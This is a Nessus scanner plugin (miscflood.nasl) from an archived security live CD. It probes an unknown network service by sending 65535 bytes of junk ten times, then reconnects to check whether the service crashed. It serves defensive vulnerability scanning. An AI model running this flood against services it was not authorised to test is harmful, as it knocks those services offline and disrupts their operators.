home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / miscflood.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  142 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>, starting 
  3. # from winnuke.nasl, then fixed and heavily hacked by Renaud Deraison
  4. # (as usual :) 
  5. #
  6. # Should cover bid 7345
  7. #
  8. # See the Nessus Scripts License for details
  9. #
  10. # Services known to crash or freeze on too much data:
  11. # Calisto Internet Talker Version 0.04 and prior
  12. #
  13. ################
  14. # References
  15. ################
  16. #
  17. # From: "subversive " <subversive@linuxmail.org>
  18. # To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
  19. # Date: Mon, 25 Nov 2002 09:33:49 +0800
  20. # Subject: SFAD02-002: Calisto Internet Talker Remote DOS
  21. #
  22.  
  23. if(description)
  24. {
  25.  script_id(10735);
  26.  script_version ("$Revision: 1.20 $");
  27.  
  28.  name["english"] = "Generic flood";
  29.  name["francais"] = "Surcharge gΘnΘrique";
  30.  script_name(english:name["english"], francais:name["francais"]);
  31.  
  32.  desc["english"] = "
  33. It was possible to crash the remote service by flooding it with too much data.
  34.  
  35. An attacker may use this flaw to make this service crash continuously, 
  36. preventing this service from working properly. It may also be possible
  37. to exploit this flaw to execute arbitrary code on this host.
  38.  
  39.  
  40. Solution : upgrade your software or contact your vendor and inform it of this 
  41. vulnerability
  42. Risk factor : High";
  43.  
  44.  
  45.  desc["francais"] = "Il a ΘtΘ possible de tuer 
  46. le service distant en l'inondant de donnΘes.
  47.  
  48. Un pirate peut exploiter cette faille 
  49. pour faire planter continuellement ce
  50. service, vous empΩchant ainsi de travailler
  51. correctement.
  52.  
  53.  
  54. Solution: mettez α jour votre logiciel ou 
  55. contactez votre vendeur et informez-le de cette
  56. vulnΘrabilitΘ.
  57.  
  58. Facteur de risque : ElevΘ";
  59.  
  60.  script_description(english:desc["english"], francais:desc["francais"]);
  61.  
  62.  summary["english"] = "Flood against the remote service";
  63.  summary["francais"] = "Surcharge du service distant";
  64.  script_summary(english:summary["english"], francais:summary["francais"]);
  65.  
  66.  # Maybe we should set this to ACT_DESTRUCTIVE_ATTACK only?
  67.  if (ACT_FLOOD) script_category(ACT_FLOOD);
  68.  else        script_category(ACT_DENIAL);
  69.  
  70.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison & Michel Arboi",
  71.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison & Michel Arboi");
  72.  family["english"] = "Denial of Service";
  73.  family["francais"] = "DΘni de service";
  74.  
  75.  script_family(english:family["english"], francais:family["francais"]);
  76.  script_dependencie("find_service.nes");
  77.  script_require_ports("Services/unknown");
  78.  exit(0);
  79. }
  80.  
  81. #
  82.  
  83. port = get_kb_item("Services/unknown");
  84. if (! port) exit(0);
  85. if (! get_port_state(port)) exit(0);
  86.  
  87.  soc = open_sock_tcp(port);
  88.  if (! soc)
  89.  {
  90.   exit(0);
  91.  }
  92.  
  93.  r = recv(socket:soc, length:4096, timeout:5);
  94.  if(!r) has_banner = 0;
  95.  else has_banner = 1;
  96.  if(!has_banner)
  97.  {
  98.    send(socket:soc, data:string("HELP\r\n"));
  99.    r = recv(socket:soc, length:4096, timeout:5);
  100.    if(r)replies_to_help = 1;
  101.    else replies_to_help = 0;
  102.  }
  103.  
  104.  close(soc);
  105.  
  106.  
  107.  soc = open_sock_tcp(port);
  108.  if ( soc )
  109.  {
  110.  send(socket:soc, data:crap(65535)) x 10;
  111.  close(soc);
  112.  }
  113.  
  114.  soc = open_sock_tcp(port);
  115.  if(!soc)
  116.  {
  117.   security_hole(port);
  118.  }
  119.  else
  120.  {
  121.   if(has_banner)
  122.   {
  123.    r = recv(socket:soc, length:4096, timeout:10);
  124.    if(!r) {
  125.     security_hole(port);
  126.    }
  127.   }
  128.   else
  129.   {
  130.    if(replies_to_help)
  131.    {
  132.     send(socket:soc, data:string("HELP\r\n"));
  133.     r =  recv(socket:soc, length:4096, timeout:10);
  134.     if(!r)
  135.     {
  136.      security_hole(port);
  137.     }
  138.    }
  139.   }
  140.  }
  141.  
  142.